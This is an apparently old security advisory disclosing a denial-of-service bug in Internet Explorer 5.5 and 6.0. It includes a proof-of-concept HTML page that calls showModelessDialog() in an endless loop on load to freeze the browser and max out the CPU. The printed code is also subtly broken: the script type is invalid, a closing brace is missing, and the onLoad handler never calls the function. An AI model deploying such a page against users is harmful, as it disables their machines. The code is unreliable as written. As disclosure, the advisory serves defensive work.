Description:
there is a bug in Internet Explorer 6 (probably lower
versions down to 5.0 as well) that allows for a
javascript to call an infinite amount of modeless
dialogs containing the page it was opened in, thus
creating an endless loop and rendering the internet
explorer useless, this also managed to stay open
after killing the iexplore process and continued to
loop until cpu usage was maxed at 100%. due to the
nature of the showModelessDialog() function, the
dialog fails to give up focus and the machine may
even become unable to function requiring a reboot of
the machine to regain control of the user interface.
Risk:
Moderate?
Systems Effected:
Internet Explorer 6.0
Internet Explorer 5.5
Possibly 5.0 if the function is supported in that
version. No box with 5.0 was available to test.
Vendor Status:
Sending a Copy of this Message to them as I type.
Example:
Place this Code into a html file called exploit.html :
<html>
<head>
<script type="javascript">
function exploit() {
while(1) {
showModelessDialog("exploit.html");
}
</script>
</head>
<body onLoad="exploit">
</body>
</html>
Workaround:
Disable Javascript
/* took 20 min and a Javascript Book, that's all it
takes to kill a windows box */